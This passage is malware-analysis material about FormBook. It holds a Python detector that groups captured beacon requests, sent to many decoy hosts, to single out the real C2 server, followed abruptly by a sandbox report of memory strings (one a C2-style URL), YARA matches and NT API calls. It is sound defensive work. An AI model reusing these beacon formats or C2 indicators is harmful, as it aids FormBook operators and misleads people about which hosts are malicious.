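    beacon("www.cindywillardrealtor.com", "d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7"),
    beacon("www.wideawakemomma.com", "n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM"),
    beacon("www.vermogenswerte.com", "vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r"),
    beacon("www.thenorthgoldline.com", "ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q"),
    beacon("www.extinctionbrews.com", "DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p"),
    # Benign control (constructed): has a User-Agent and a different template.
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]


def parse_request(raw):
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path,
            "params": parse_qsl(url.query, keep_blank_values=True), "headers": headers}


def beacon_template(req):
    """The stable part of a check-in: method, path, parameter names and any short
    constant value; long values are the per-request encrypted blob and are wildcarded."""
    shape = tuple((k, v if len(v) <= 8 else "*") for k, v in req["params"])
    return (req["method"], req["path"], shape)


def find_round_robin_beacons(raws, min_hosts=3):
    """Templates sent to at least min_hosts distinct Host values."""
    groups = defaultdict(lambda: {"hosts": set(), "total": 0, "no_ua": 0})
    for raw in raws:
        req = parse_request(raw)
        g = groups[beacon_template(req)]
        g["hosts"].add(req["headers"].get("host", "").lower())
        g["total"] += 1
        g["no_ua"] += "user-agent" not in req["headers"]
    return [{"method": m, "path": p, "param_shape": shape, "hosts": sorted(g["hosts"]),
             "all_missing_user_agent": g["no_ua"] == g["total"]}
            for (m, p, shape), g in groups.items() if len(g["hosts"]) >= min_hosts]


def _bare(host):
    return host[4:] if host.startswith("www.") else host


def classify_hosts(hosts, config):
    """Label each Host as 'c2', 'decoy' or 'unknown' against the extracted config."""
    c2 = {_bare(u.split("/", 1)[0].lower()) for u in config["C2 list"]}
    decoys = {d.lower() for d in config["decoy"]}
    labels = {}
    for h in hosts:
        b = _bare(h.lower())
        labels[h] = "c2" if b in c2 else "decoy" if b in decoys else "unknown"
    return labels


if __name__ == "__main__":
    for finding in find_round_robin_beacons(RAW_REQUESTS):
        print(finding["method"], finding["path"], "->", len(finding["hosts"]), "hosts,",
              "no User-Agent" if finding["all_missing_user_agent"] else "has User-Agent")
        for host, label in classify_hosts(finding["hosts"], CONFIG).items():
            print("  ", host, label)
```

Grouping on the template rather than on any one domain is what makes this useful for blocking: the decoys are legitimate third-party sites that change from build to build, so the durable indicator is the path plus parameter layout, and the configuration extracted from memory is what separates the one host worth sinkholing from the sixty-odd that are noise.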
Source: raserver.exe, 0000000D.00000002.513072851.00000000052E2000.00000004.00000001.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: raserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmp | String found in binary or memory: http://www.aizaibali.com/
Source: raserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmp | String found in binary or memory: http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGN
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: pMbPS8nCm1.exe, 00000001.00000002.248667021.000000000078A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_004181D0 NtCreateFile
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00418280 NtReadFile
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00418300 NtClose
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_004183B0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00418222 NtCreateFile
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_004183AA NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C995D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C999A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C996D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C996E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C998F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C998A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C9B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C999D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C995F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99560 NtWriteFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C9AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99A10 NtQuerySection
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99A20 NtResumeThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C997A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C9A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99760 NtOpenProcess
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C9A770 NtOpenThread
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C9A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C99730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009B81D0 NtCreateFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009B8280 NtReadFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009B83B0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009B8300 NtClose
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009B8222 NtCreateFile
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009B83AA NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_0040102E
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_0041B8FB
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00408C6C
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00408C70
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_0041B57A
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00402D88
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_0041C58A
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00402D90
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00402FB0
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6B090
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11002
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6841F
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6D5E0
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D21D55
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5F900
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C50D20
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C74120
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C76E30
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8EBB0
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009BB8FB
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009A8C70
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009A8C6C
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009A2D90
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009BC58A
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009A2D88
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009BB57A
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009A2FB0
          Source: C:\Windows\SysWOW64\raserver.exe | String function: 04C5B150 appears 32 times
          Source: pMbPS8nCm1.exe, 00000001.00000003.243940877.0000000002406000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs pMbPS8nCm1.exe
          Source: pMbPS8nCm1.exe, 00000002.00000002.307872984.0000000000CBF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs pMbPS8nCm1.exe
          Source: pMbPS8nCm1.exe, 00000002.00000002.308207312.0000000000D89000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameraserver.exej% vs pMbPS8nCm1.exe
          Source: pMbPS8nCm1.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
